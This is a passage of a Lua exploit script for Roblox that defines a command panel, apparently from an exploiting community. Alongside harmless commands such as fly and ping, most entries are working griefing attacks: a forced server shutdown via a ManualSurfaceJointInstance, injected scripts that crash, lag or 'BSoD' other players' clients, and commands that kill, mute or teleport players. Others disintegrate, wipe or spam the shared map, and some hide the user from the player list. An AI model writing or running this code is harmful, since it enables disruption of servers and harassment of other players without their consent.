  963. AddCmd("Playerinfo","pinfo","Shows info on a player",
  964. function(plrs)
  965. for _,plr in pairs(plrs) do
  966. if plr then
  967. Output("Age: "..plr.AccountAge,"noncolar")
  968. Output("Membership: "..plr.MembershipType.Name,"Hot pink")
  969. Output("Player: "..plr.Name,"Really red")
  970. Output("Id: "..plr.userId,"New Yeller")
  971. Output("Camera Mode: "..plr.CameraMode.Name,"Dark green")
  972. end
  973. end
  974. end)
  975.  
  976. AddCmd("Force shutdown","fsd","Forces shutdown with a ManualSurfaceJoint",
  977. function(nothing, msg)
  978. NewS([[local b = Instance.new ("ManualSurfaceJointInstance",Workspace)]],workspace)
  979. end
  980. )
  981.  
  982. AddCmd("Message","m","Show a message",
  983. function(nothing, msg)
  984. if found then
  985. NewS([[
  986. a = Instance.new("Message", workspace)
  987. msg = "]]..msg..[["
  988. msg = msg:gsub("","\5")
  989. game:service'Debris':AddItem(a, 5)
  990. while wait() do
  991. for i = 30,0,-1 do
  992. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  993. wait()
  994. end
  995. for i = 0,30,1 do
  996. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  997. wait()
  998. end
  999. end
  1000. ]], workspace)
  1001. end
  1002. end
  1003. )
  1004.  
  1005. AddCmd("Create base","base","Create the base",
  1006. function()
  1007. a = Instance.new("Part")
  1008. a.Parent = Workspace
  1009. a.Name = "Base"
  1010. a.Position = Vector3.new(0, 0.6, 0)
  1011. a.Size = Vector3.new(1002, 0, 1002)
  1012. a.Material = "Grass"
  1013. a.Anchored = true
  1014. a.BrickColor = BrickColor.new("Dark green")
  1015. end
  1016. )
  1017.  
  1018. AddCmd("Ping","ping","Ping something",
  1019. function(plrs, msg)
  1020. if msg == "" then
  1021. Output("pong", __)
  1022. else
  1023. Output(msg, __)
  1024. end
  1025. end
  1026. )
  1027.  
  1028. AddCmd("Dismiss","dt","Dismiss tabs",
  1029. function()
  1030. Dismiss()
  1031. end
  1032. )
  1033.  
  1034. AddCmd("God player","god","OYUS FULL HEALTH",
  1035. function(plrs)
  1036. for _, plr in pairs(plrs) do
  1037. if plr and plr.Character and plr.Character.Humanoid then
  1038. me = plr
  1039. select=Instance.new("SelectionBox",me.Character.Head)
  1040. select1=Instance.new("SelectionBox",me.Character.Torso)
  1041. select2=Instance.new("SelectionBox",me.Character["Right Arm"])
  1042. select3=Instance.new("SelectionBox",me.Character["Left Arm"])
  1043. select4=Instance.new("SelectionBox",me.Character["Left Leg"])
  1044. select5=Instance.new("SelectionBox",me.Character["Right Leg"])
  1045. select.Adornee=me.Character.Head
  1046. select1.Adornee=me.Character.Torso
  1047. select2.Adornee=me.Character["Right Arm"]
  1048. select3.Adornee=me.Character["Left Arm"]
  1049. select4.Adornee=me.Character["Left Leg"]
  1050. select5.Adornee=me.Character["Right Leg"]
  1051. me.Character.Humanoid.MaxHealth=math.huge
  1052. end
  1053. end
  1054. end
  1055. )
  1056.  
  1057. AddCmd("BSoD","bsod","BSoD a player",
  1058. function(Plrs)
  1059. for _, plr in pairs(Plrs) do
  1060. if plr and plr.Backpack then
  1061. for i = 0,7,1 do
  1062. NewLS(BSoDSource, plr.Backpack)
  1063. Output("You BSoD'D "..plr.Name, __)
  1064.  
  1065. end
  1066. end
  1067. end
  1068. end
  1069. )
  1070.  
  1071.  
  1072.  
  1073. AddCmd("Nilp","nils","see who is nil *BETA*",
  1074. function()
  1075. NewS([[
  1076. Model = Instance.new("Model", game.Lighting)
  1077. Model.Name = "V3rm Tabs"
  1078. for _,v in pairs(game:service'NetworkServer':children()) do
  1079. if v:GetPlayer() then
  1080. if v:GetPlayer().Parent ~= game:service'Players' then
  1081. Instance.new("StringValue",Model).Value = v:GetPlayer().Name
  1082. end
  1083. end
  1084. end
  1085. ]], workspace)
  1086. wait()
  1087. np = nil
  1088. for i = 0,5,1 do
  1089. if game.Lighting:findFirstChild("V3rm Tabs") then
  1090. np = game.Lighting:findFirstChild("V3rm Tabs")
  1091. break
  1092. end
  1093. wait(0.1)
  1094. end
  1095. if np ~= nil then
  1096. Dismiss()
  1097. for _,v in pairs(np:children()) do
  1098. if v:IsA("StringValue") then
  1099. Output(v.Value,"Really red")
  1100. end
  1101. end
  1102. elseif np == nil then
  1103. Output("Something went wrong.","Really red")
  1104. end
  1105. end
  1106. )
  1107.  
  1108. AddCmd("Probe mode", "probe", "temp nil",
  1109. function()
  1110. probemode = true
  1111. Dismiss()
  1112. if LocalPlayer.Character then LocalPlayer.Character = nil end
  1113. if workspace.CurrentCamera == nil then return end
  1114. local camera = workspace.CurrentCamera
  1115. local probe = Instance.new("Part", workspace)
  1116. probe.Shape = "Ball"
  1117. probe.Color = Color3.new(0, 255, 255)
  1118. probe.Anchored = true
  1119. probe.Transparency = (0.5)
  1120. probe.Size = Vector3.new(2, 2, 2)
  1121. probe.CanCollide = false
  1122.  
  1123. P.Color = Color3.new(170, 0, 255)
  1124.  
  1125. One = Instance.new("Decal", probe)
  1126. Two = Instance.new("Decal", probe)
  1127. Three = Instance.new("Decal", probe)
  1128. Four = Instance.new("Decal", probe)
  1129. Five = Instance.new("Decal", probe)
  1130. Six = Instance.new("Decal", probe)
  1131. One.Texture = "http://www.roblox.com/asset/?id=161007708"
  1132. Two.Texture = "http://www.roblox.com/asset/?id=161007708"
  1133. Three.Texture = "http://www.roblox.com/asset/?id=161007708"
  1134. Four.Texture = "http://www.roblox.com/asset/?id=161007708"
  1135. Five.Texture = "http://www.roblox.com/asset/?id=161007708"
  1136. Six.Texture = "http://www.roblox.com/asset/?id=161007708"
  1137. One.Face = "Front"
  1138. Two.Face = "Back"
  1139. Three.Face = "Right"
  1140. Four.Face = "Left"
  1141. Five.Face = "Top"
  1142. Six.Face = "Bottom"
  1143.  
  1144. local s = Instance.new("SelectionBox")
  1145.  
  1146. s.Color = BrickColor.new("Really black")
  1147. s.Adornee = probe
  1148. s.Parent = probe
  1149. s.Transparency = (0.4)
  1150. probe.TopSurface = 0
  1151. probe.Color = Color3.new(170, 0, 255)
  1152. probe.Anchored = true
  1153. probe.BottomSurface = 0
  1154. probe.Name = LocalPlayer.Name.."'s probe"
  1155. local rotation = 0
  1156. local bbg = Instance.new("BillboardGui", probe)
  1157. bbg.Size = UDim2.new(3, 0, 3 ,0)
  1158. bbg.ExtentsOffset = Vector3.new(0, 2, 0)
  1159. local txt = Instance.new("TextLabel", bbg)
  1160. txt.FontSize = "Size24"
  1161. txt.Font = "SourceSansBold"
  1162. txt.Text = LocalPlayer.Name
  1163. txt.BackgroundTransparency = 1
  1164. txt.TextColor3 = Color3.new(0, 255, 255)
  1165. txt.TextStrokeTransparency = 0
  1166. txt.Size = UDim2.new(1,0,1,0)
  1167. local pl = Instance.new("PointLight", probe)
  1168. pl.Shadows = true
  1169. pl.Range = 20
  1170. coroutine.wrap(function()
  1171. while pl ~= nil do
  1172. pl.Color = Color3.new(math.random(), math.random(), math.random())
  1173. wait(0.8)
  1174. end
  1175. end)()
  1176. coroutine.wrap(function()
  1177. while LocalPlayer.Character == nil and probe.Parent == workspace and probe ~= nil and game:service'RunService'.Stepped:wait() do
  1178. probe.CFrame = camera.Focus * CFrame.Angles(0, rotation, 0)
  1179. rotation = rotation + 0.1
  1180. end
  1181. if camera then
  1182. camera:Destroy()
  1183. end
  1184. probe:Destroy()
  1185. end)()
  1186. end
  1187. )
  1188.  
  1189.  
  1190. AddCmd("reload","char","Creates your character",
  1191. function()
  1192. if workspace.CurrentCamera == nil then return end
  1193. local camera = workspace.CurrentCamera
  1194. local new_char = game:service("InsertService"):LoadAsset(68452456):GetChildren()[1]
  1195. local human = new_char.Humanoid
  1196. human.Parent = nil
  1197. new_char.Name = LocalPlayer.Name
  1198. wait()
  1199. human.Parent = new_char
  1200. camera.CameraSubject = human
  1201. camera.CameraType = "Custom"
  1202. new_char.Parent = workspace
  1203. local pl = Instance.new("PointLight", new_char.Head)
  1204. pl.Range = 24
  1205. pl.Shadows = true
  1206. LocalPlayer.Character = new_char
  1207. new_char:MakeJoints()
  1208. new_char.Torso.BrickColor = torsocolor
  1209. new_char["Left Leg"].BrickColor = leftlegcolor
  1210. new_char["Right Leg"].BrickColor = rightlegcolor
  1211. new_char["Left Arm"].BrickColor = leftarmcolor
  1212. new_char["Right Arm"].BrickColor = rightarmcolor
  1213. new_char.Head.BrickColor = headcolor
  1214. for i,v in pairs(Clothes) do
  1215. v:Clone().Parent = new_char
  1216. end
  1217. probemode = false
  1218. end
  1219. )
  1220.  
  1221. AddCmd("stop plsplspls","vremove","Remove Admin",
  1222. function()
  1223. Output("y u remove dis",
  1224. function()
  1225. Output("fine...qq",
  1226. function()
  1227. for i,v in pairs(getfenv(1)) do
  1228. getfenv(1)[i] = nil
  1229. end
  1230. script.Disabled = true
  1231. LocalPlayer = NO_PLAYER
  1232. script:findFirstChild(SourceName).Value = " "
  1233. script.Disabled = true
  1234. V3rmModel:ClearAllChildren()
  1235. V3rmModel:Destroy()
  1236. connection:disconnect()
  1237. Tabs = {}
  1238. Cmds = {}
  1239. Banlist = {}
  1240. fukhed.all = true
  1241. coroutine.resume(coroutine.create(function()
  1242. while wait(0.1) do
  1243. Dismiss()
  1244. end
  1245. end))
  1246. end)
  1247. end)
  1248. end
  1249. )
  1250.  
  1251. AddCmd("ForceField","ff","Give forcefield to player",
  1252. function(plrs)
  1253. for _, plr in pairs(plrs) do
  1254. if plr and plr.Character then
  1255. Instance.new("ForceField", plr.Character)
  1256. end
  1257. end
  1258. end
  1259. )
  1260.  
  1261. function ShowBL()
  1262. Dismiss()
  1263. for _,v in pairs(Banlist) do
  1264. Output(v, "Really red", function()
  1265. Dismiss()
  1266. Output("Un-ban", "Black", function() table.remove(Banlist,_) end)
  1267. Output("Back", "Really red", function() ShowBL() end)
  1268. end)
  1269. end
  1270. end
  1271.  
  1272. AddCmd("Banlist","bl","Show banned players",
  1273. function()
  1274. ShowBL()
  1275. end
  1276. )
  1277.  
  1278. AddCmd("Lag player","lg","Lag a player",
  1279. function(plrs)
  1280. for _, plr in pairs(plrs) do
  1281. if plr and plr.Backpack then
  1282. NewLS(LagSource, plr.Backpack)
  1283. end
  1284. end
  1285. end
  1286. )
  1287.  
  1288. AddCmd("Crash player","crash","Crash the player",
  1289. function(plrs)
  1290. for _, plr in pairs(plrs) do
  1291. if plr and plr.Backpack then
  1292. NewLS([==[
  1293. game:GetService("RunService").RenderStepped(function()
  1294. Delay(0, function() return end)
  1295. end)]==], plr.Backpack)
  1296. end
  1297. end
  1298. end
  1299. )
  1300.  
  1301. AddCmd("Kill player","kill","Kill a player",
  1302. function(plrs)
  1303. for _, plr in pairs(plrs) do
  1304. if plr and plr.Character then
  1305. plr.Character:BreakJoints()
  1306. end
  1307. end
  1308. end
  1309. )
  1310.  
  1311.  
  1312. AddCmd("Respawn player","respawn","Respawn the player",
  1313. function(plrs)
  1314. for _, plr in pairs(plrs) do
  1315. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  1316. end
  1317. end
  1318. )
  1319.  
  1320. AddCmd("Mute player","mute","Block the player chat",
  1321. function(plrs)
  1322. for _, plr in pairs(plrs) do
  1323. if plr and plr.Backpack then
  1324. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", plr.Backpack)
  1325. end
  1326. end
  1327. end
  1328. )
  1329.  
  1330. AddCmd("Unmute player","unmute","Unblock the player chat",
  1331. function(plrs)
  1332. for _, plr in pairs(plrs) do
  1333. if plr and plr.Backpack then
  1334. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, true)", plr.Backpack)
  1335. end
  1336. end
  1337. end
  1338. )
  1339.  
  1340. AddCmd("Un-ForceField","unff","Remove the forcefield that you gave to player",
  1341. function(plrs)
  1342. for _, plr in pairs(plrs) do
  1343. if plr and plr.Character then
  1344. pcall(function()
  1345. for _,v in pairs(plr.Character:GetChildren()) do
  1346. if v:IsA("ForceField") then
  1347. v:Destroy()
  1348. end
  1349. end
  1350. end)
  1351. end
  1352. end
  1353. end
  1354. )
  1355.  
  1356. AddCmd("Bsod Spam","dsz","Make everything bsod",
  1357. function()
  1358. function meands(obj)
  1359. for i,v in pairs(obj:GetChildren()) do
  1360. if v:IsA("BasePart") then
  1361. One = Instance.new("Decal", v)
  1362. Two = Instance.new("Decal", v)
  1363. Three = Instance.new("Decal", v)
  1364. Four = Instance.new("Decal", v)
  1365. Five = Instance.new("Decal", v)
  1366. Six = Instance.new("Decal", v)
  1367. One.Texture = "http://www.roblox.com/asset/?id=3529576"
  1368. Two.Texture = "http://www.roblox.com/asset/?id=3529576"
  1369. Three.Texture = "http://www.roblox.com/asset/?id=3529576"
  1370. Four.Texture = "http://www.roblox.com/asset/?id=3529576"
  1371. Five.Texture = "http://www.roblox.com/asset/?id=3529576"
  1372. Six.Texture = "http://www.roblox.com/asset/?id=3529576"
  1373. One.Face = "Front"
  1374. Two.Face = "Back"
  1375. Three.Face = "Right"
  1376. Four.Face = "Left"
  1377. Five.Face = "Top"
  1378. Six.Face = "Bottom"
  1379. end
  1380. meands(v)
  1381. end
  1382. end
  1383. meands(workspace)
  1384. end
  1385. )
  1386.  
  1387. AddCmd("Decal Spam","ds","Make everything decal",
  1388. function()
  1389. function meands(obj)
  1390. for i,v in pairs(obj:GetChildren()) do
  1391. if v:IsA("BasePart") then
  1392. One = Instance.new("Decal", v)
  1393. Two = Instance.new("Decal", v)
  1394. Three = Instance.new("Decal", v)
  1395. Four = Instance.new("Decal", v)
  1396. Five = Instance.new("Decal", v)
  1397. Six = Instance.new("Decal", v)
  1398. One.Texture = "http://www.roblox.com/asset/?id=161007708"
  1399. Two.Texture = "http://www.roblox.com/asset/?id=161007708"
  1400. Three.Texture = "http://www.roblox.com/asset/?id=161007708"
  1401. Four.Texture = "http://www.roblox.com/asset/?id=161007708"
  1402. Five.Texture = "http://www.roblox.com/asset/?id=161007708"
  1403. Six.Texture = "http://www.roblox.com/asset/?id=161007708"
  1404. One.Face = "Front"
  1405. Two.Face = "Back"
  1406. Three.Face = "Right"
  1407. Four.Face = "Left"
  1408. Five.Face = "Top"
  1409. Six.Face = "Bottom"
  1410. local s = Instance.new("SelectionBox")
  1411. s.Color = BrickColor.random()
  1412. s.Adornee = v
  1413. s.Parent = v
  1414. s.Transparency = (0.4)
  1415. end
  1416. meands(v)
  1417. end
  1418. end
  1419. meands(workspace)
  1420. end
  1421. )
  1422.  
  1423. AddCmd("brick spam all","bs","Brick Spam da game",
  1424. function()
  1425. while true do
  1426. wait()
  1427. p = Instance.new("Part")
  1428. p.Size = Vector3.new(math.random(1,30),math.random(1,30),math.random(1,30))
  1429. p.BrickColor = BrickColor.random()
  1430. p.Position = Vector3.new(math.random(-200,200),100,math.random(-200,200))
  1431. p.Reflectance = (math.random(0,100) / 100)
  1432. p.Locked = false
  1433. p.Name = "anton20 was here"
  1434. p.Parent = game.Workspace
  1435. One = Instance.new("Decal", p)
  1436. Two = Instance.new("Decal", p)
  1437. Three = Instance.new("Decal", p)
  1438. Four = Instance.new("Decal", p)
  1439. Five = Instance.new("Decal", p)
  1440. Six = Instance.new("Decal", p)
  1441. One.Texture = "http://www.roblox.com/asset/?id=161007708"
  1442. Two.Texture = "http://www.roblox.com/asset/?id=161007708"
  1443. Three.Texture = "http://www.roblox.com/asset/?id=161007708"
  1444. Four.Texture = "http://www.roblox.com/asset/?id=161007708"
  1445. Five.Texture = "http://www.roblox.com/asset/?id=161007708"
  1446. Six.Texture = "http://www.roblox.com/asset/?id=161007708"
  1447. One.Face = "Front"
  1448. Two.Face = "Back"
  1449. Three.Face = "Right"
  1450. Four.Face = "Left"
  1451. Five.Face = "Top"
  1452. Six.Face = "Bottom"
  1453.  
  1454. local s = Instance.new("SelectionBox")
  1455.  
  1456. s.Color = BrickColor.random()
  1457. s.Adornee = p
  1458. s.Parent = p
  1459. s.Transparency = (0.4)
  1460. end
  1461. end
  1462. )
  1463.  
  1464. AddCmd("FClean","fclean","Fully clear",
  1465. function()
  1466. for i,s in pairs(workspace:GetChildren()) do
  1467. if game:GetService("Players"):GetPlayerFromCharacter(s) == nil then
  1468. if s.className ~= "Terrain" then
  1469. if s.className ~= "Camera" then
  1470. pcall(function() s:Destroy() end)
  1471. end end end end
  1472. local b = Instance.new("Part", Game:GetService("Workspace"))
  1473. b.Size = Vector3.new(3000, 1, 3000)
  1474. b.CFrame = CFrame.new(0, 0, 0)
  1475. b.Name = "Base"
  1476. b.BrickColor = BrickColor.new("Earth green")
  1477. b.TopSurface = "Smooth"
  1478. b.BottomSurface = "Smooth"
  1479. b.LeftSurface = "Smooth"
  1480. b.RightSurface = "Smooth"
  1481. b.FrontSurface = "Smooth"
  1482. b.BackSurface = "Smooth"
  1483. b.Anchored = true
  1484. b.Locked = true
  1485. local sl = Instance.new("SpawnLocation", workspace)
  1486. sl.Anchored = true
  1487. sl.Locked = true
  1488. sl.formFactor = "Plate"
  1489. sl.Size = Vector3.new(6, 0.4, 6)
  1490. sl.CFrame = CFrame.new(0, 0.6, 0)
  1491. sl.BrickColor = BrickColor.new("Really blue")
  1492. sl.TopSurface = "Smooth"
  1493. sl.BottomSurface = "Smooth"
  1494. sl.LeftSurface = "Smooth"
  1495. sl.RightSurface = "Smooth"
  1496. sl.FrontSurface = "Smooth"
  1497. sl.BackSurface = "Smooth"
  1498. game.Lighting.FogEnd = 10011111111
  1499. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  1500. game.Lighting.TimeOfDay = "14:00:00"
  1501. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  1502. game.Lighting.Brightness = 1
  1503. game.Lighting.ColorShift_Bottom = Color3.new(0,0,0)
  1504. game.Lighting.ColorShift_Top = Color3.new(0,0,0)
  1505. game.Lighting.ShadowColor = Color3.new(0.7,0.7,0.7)
  1506. end
  1507. )
  1508.  
  1509.  
  1510. AddCmd("BSoD BanList","bbl","Show BSod banned players",
  1511. function()
  1512. Showbb()
  1513. end
  1514. )
  1515.  
  1516. AddCmd("'BSoD' ban","bb","BSoD ban a player",
  1517. function(plrs, msg)
  1518. for _,v in pairs(plrs) do
  1519. if v then
  1520. table.insert(BSoDBanList,v.Name)
  1521. Output('|BSoD Banned | '..v.Name,__)
  1522. for _, plr in pairs(plrs) do
  1523. if plr and plr.Backpack then
  1524. NewLS(BSoDSource, plr.Backpack)
  1525. else
  1526. Output(Error)
  1527. end
  1528. end
  1529. end
  1530. end
  1531. end
  1532. )
  1533.  
  1534. function Showbb()
  1535. Dismiss()
  1536. for _,v in pairs(BSoDBanList) do
  1537. Output(v,nil, function()
  1538. Dismiss()
  1539. Output(v)
  1540. Output("Un-Ban","Really red", function()
  1541. table.remove(BSoDBanList, _)
  1542. end)
  1543. Output("Back","Really red", function()
  1544. Showbb()
  1545. end)
  1546. end)
  1547. end
  1548. end
  1549.  
  1550. AddCmd("Number of commands","ncmds","0var 9000 qq not rlly soon tho",
  1551. function()
  1552. Output(#Cmds, __)
  1553. end
  1554. )
  1555.  
  1556.  
  1557.  
  1558. AddCmd("GetAge","ga","Get age of a player",
  1559. function(Plrs)
  1560. for _, plr in pairs(Plrs) do
  1561. if plr then
  1562. Output(plr.Name..": "..tostring(plr.AccountAge))
  1563. end
  1564. end
  1565. end)
  1566.  
  1567.  
  1568. AddCmd("StampTools","stools","StamperTools lel",
  1569. function()
  1570. x = game:GetService("InsertService"):LoadAsset(73089166) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1571. x = game:GetService("InsertService"):LoadAsset(73089204) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1572. x = game:GetService("InsertService"):LoadAsset(73089190) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1573. x = game:GetService("InsertService"):LoadAsset(58880579) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1574. x = game:GetService("InsertService"):LoadAsset(60791062) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1575. x = game:GetService("InsertService"):LoadAsset(73089239) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1576. end
  1577. )
  1578. AddCmd("md-Map Disintegrate","md","Map Disintegrate",
  1579. function()
  1580. game.Players.LocalPlayer.Character=nil
  1581. wait(.1)
  1582. function FindStuff(where)
  1583. for i,v in pairs(where:GetChildren()) do
  1584. if v:IsA("Part") or v:IsA("BasePart") then
  1585. s=Instance.new("SelectionBox")
  1586. s.Parent=v
  1587. s.Adornee=v
  1588. v.BrickColor=BrickColor.new("Really red")
  1589. v.Anchored=false
  1590. v:BreakJoints()
  1591. v.CanCollide=false
  1592. wait()
  1593. else
  1594. end
  1595. FindStuff(v)
  1596. end
  1597. end
  1598. FindStuff(game.Workspace)
  1599. FindStuff(game.Workspace)
  1600. end
  1601. )
  1602.  
  1603.  
  1604. AddCmd("nclip","nclip","noclip",
  1605. function()
  1606. repeat wait(1/44) until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Humanoid") and game.Players.LocalPlayer.Character:findFirstChild("Torso") and game.Players.LocalPlayer:GetMouse() and game.Workspace.CurrentCamera local mouse = game.Players.LocalPlayer:GetMouse() local torso = game.Players.LocalPlayer.Character.Torso local dir = {w = 0, s = 0, a = 0, d = 0} local spd = 2 mouse.KeyDown:connect(function(key) if key:lower() == "w" then dir.w = 1 elseif key:lower() == "s" then dir.s = 1 elseif key:lower() == "a" then dir.a = 1 elseif key:lower() == "d" then dir.d = 1 elseif key:lower() == "q" then spd = spd + 1 elseif key:lower() == "e" then spd = spd - 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then dir.w = 0 elseif key:lower() == "s" then dir.s = 0 elseif key:lower() == "a" then dir.a = 0 elseif key:lower() == "d" then dir.d = 0 end end) torso.Anchored = true game.Players.LocalPlayer.Character.Humanoid.PlatformStand = true game.Players.LocalPlayer.Character.Humanoid.Changed:connect(function() game.Players.LocalPlayer.Character.Humanoid.PlatformStand = true end) repeat wait(1/44) torso.CFrame = CFrame.new(torso.Position, game.Workspace.CurrentCamera.CoordinateFrame.p) * CFrame.Angles(0,math.rad(180),0) * CFrame.new((dir.d-dir.a)*spd,0,(dir.s-dir.w)*spd) until nil
  1607. end
  1608. )
  1609.  
  1610. AddCmd("Fly","fly","fly lel",
  1611. function()
  1612. local mouse = game.Players.LocalPlayer:GetMouse()
  1613. repeat wait() until mouse
  1614. local plr = game.Players.LocalPlayer
  1615. local torso = plr.Character.Torso
  1616. local flying = true
  1617. local deb = true
  1618. local ctrl = {f = 0, b = 0, l = 0, r = 0}
  1619. local lastctrl = {f = 0, b = 0, l = 0, r = 0}
  1620. local maxspeed = 50
  1621. local speed = 0
  1622. function Fly()
  1623. local bg = Instance.new("BodyGyro", torso)
  1624. bg.P = 9e4
  1625. bg.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  1626. bg.cframe = torso.CFrame
  1627. local bv = Instance.new("BodyVelocity", torso)
  1628. bv.velocity = Vector3.new(0,0.1,0)
  1629. bv.maxForce = Vector3.new(9e9, 9e9, 9e9)
  1630. repeat wait()
  1631. plr.Character.Humanoid.PlatformStand = true
  1632. if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then
  1633. speed = speed+.5+(speed/maxspeed)
  1634. if speed > maxspeed then
  1635. speed = maxspeed
  1636. end
  1637. elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then
  1638. speed = speed-1
  1639. if speed < 0 then
  1640. speed = 0
  1641. end
  1642. end
  1643. if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then
  1644. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  1645. lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r}
  1646. elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then
  1647. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  1648. else
  1649. bv.velocity = Vector3.new(0,0.1,0)
  1650. end
  1651. bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0)
  1652. until not flying
  1653. ctrl = {f = 0, b = 0, l = 0, r = 0}
  1654. lastctrl = {f = 0, b = 0, l = 0, r = 0}
  1655. speed = 0
  1656. bg:Destroy()
  1657. bv:Destroy()
  1658. plr.Character.Humanoid.PlatformStand = false
  1659. end
  1660. mouse.KeyDown:connect(function(key)
  1661. if key:lower() == "e" then
  1662. if flying then flying = false
  1663. else
  1664. flying = true
  1665. Fly()
  1666. end
  1667. elseif key:lower() == "w" then
  1668. ctrl.f = 1
  1669. elseif key:lower() == "s" then
  1670. ctrl.b = -1
  1671. elseif key:lower() == "a" then
  1672. ctrl.l = -1
  1673. elseif key:lower() == "d" then
  1674. ctrl.r = 1
  1675. end
  1676. end)
  1677. mouse.KeyUp:connect(function(key)
  1678. if key:lower() == "w" then
  1679. ctrl.f = 0
  1680. elseif key:lower() == "s" then
  1681. ctrl.b = 0
  1682. elseif key:lower() == "a" then
  1683. ctrl.l = 0
  1684. elseif key:lower() == "d" then
  1685. ctrl.r = 0
  1686. end
  1687. end)
  1688. Fly()
  1689. end
  1690. )
  1691.  
  1692. AddCmd("ek","ek","Epic Katana lel",
  1693. function()
  1694. x = game:GetService("InsertService"):LoadAsset(18017365) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1695. x = game:GetService("InsertService"):LoadAsset(21294489) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1696. x = game:GetService("InsertService"):LoadAsset(18776718) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1697. x = game:GetService("InsertService"):LoadAsset(20577851) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1698. x = game:GetService("InsertService"):LoadAsset(25545089) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1699. x = game:GetService("InsertService"):LoadAsset(22787168) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1700. end
  1701. )
  1702.  
  1703. AddCmd("Teleport","tp","Teleport a player to a place",
  1704. function(plrs, msg)
  1705. local keypos = msg:find(key)
  1706. local targPlayers = msg:sub(1,keypos-1)
  1707. local plrs = getPlayers(targPlayers)
  1708. local id = msg:sub(tonumber(keypos+1))
  1709. for _,v in pairs(plrs) do
  1710. if v and v.Backpack then
  1711. NewLS([[game:service'TeleportService':Teleport(]]..id..[[)]], v.Backpack)
  1712. end
  1713. end
  1714. end
  1715. )
  1716.  
  1717.  
  1718. function Output(Txt, func)
  1719. P = Instance.new("Part", V3rmModel)
  1720. P.Shape = "Block"
  1721. P.Color = Color3.new(27, 42, 53)
  1722. P.Anchored = true
  1723. P.Transparency = (0.4)
  1724. P.Size = Vector3.new(2, 3, 2)
  1725. P.CanCollide = false
  1726. P.TopSurface = "Smooth"
  1727.  
  1728. if probemode == false then
  1729. if LocalPlayer.Character.Torso then
  1730. P.Position = LocalPlayer.Character.Torso.Position
  1731. elseif LocalPlayer.Character.Torso == nil then return end
  1732. elseif probemode == true then
  1733. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1734. P.Position = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").Position
  1735. elseif game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") == nil then return end
  1736. else
  1737. return
  1738. end
  1739. local s = Instance.new("SelectionBox")
  1740. s.Color = BrickColor.new(27, 42, 53)
  1741. s.Adornee = P
  1742. s.Parent = P
  1743. s.Transparency = (0.4)
  1744. Instance.new("PointLight", P)
  1745. bg = Instance.new("BillboardGui", P)
  1746. bg.Adornee = tab
  1747. bg.Size = UDim2.new(8, 0, 7.5, 0)
  1748. bg.StudsOffset = Vector3.new(0, 1, 0)
  1749. text = Instance.new("TextLabel", bg)
  1750. text.Size = UDim2.new(1, 0, 0.2, 0)
  1751. text.FontSize = "Size18"
  1752. text.BackgroundTransparency = 1
  1753. text.Font = "Legacy"
  1754. text.TextStrokeTransparency = 0
  1755. text.TextColor3 = Color3.new(52,52,52)
  1756. text.Text = Txt
  1757. Click = Instance.new("ClickDetector",P)
  1758. Click.MaxActivationDistance = 999999999
  1759. Click.MouseClick:connect(function(Plr)
  1760. if Plr.Name == LocalPlayer.Name then
  1761. Dismiss()
  1762. func = func
  1763. func()
  1764. end
  1765. end)
  1766. table.insert(Tabs, P)
  1767. end
  1768.  
  1769. function getPlayers(msg)
  1770. local plrs = {}
  1771. if msg == "me" then
  1772. table.insert(plrs, LocalPlayer)
  1773. elseif msg == "all" then
  1774. plrs = game:GetService("Players"):GetChildren()
